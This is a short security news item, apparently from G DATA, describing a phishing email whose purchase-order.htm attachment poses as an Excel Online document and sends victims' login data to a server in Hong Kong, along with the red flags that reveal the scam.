Attackers are targeting company employees' login data.
The Locky ransomware case has not been the first time that attack attempts have been carried out via email. 54 billion spam messages are sent every day worldwide alone (source: Eleven). These involve not only mass attacks, but also highly targeted ones. In the current case we are dealing with a scam that tends to target companies. The procedure is new. Recipients of the email can only see that this is an attempt at fraud if they look very carefully. G DATA security solutions identify the attachment as Script.Trojan-Stealer.Phish.AG. The security experts at G DATA SecurityLabs have discussed the new scam in their latest blog entry.
The email that arrives in potential victims' inboxes is supposedly an order with an attachment called purchase-order.htm. But there are clues in the email that point to a scam. The company does not exist under the given name, the sender address is not real, and the text contains spelling mistakes. If the attackers gain access to an email account belonging to a private individual or a company, it can be used to send more spam. If access data belonging to a company gets out, far-reaching problems can arise, such as unauthorised access to internal company data and emails.
The file disguises itself as a type of Microsoft Excel Online Document. In the background, an Excel spreadsheet can be seen. However, this is just an image, not a spreadsheet that can be edited. The image is loaded from a server based in Hong Kong. Recipients are supposed to enter their login data into the form to start the download. After clicking on "Download", the email address and password they entered are sent to the same server in Hong Kong from which the images were downloaded – albeit to a different domain. This suggests that the entire server is being controlled by the attackers. After the data has been sent, a web page containing an error message is displayed.
For more information, see the G DATA SecurityBlog.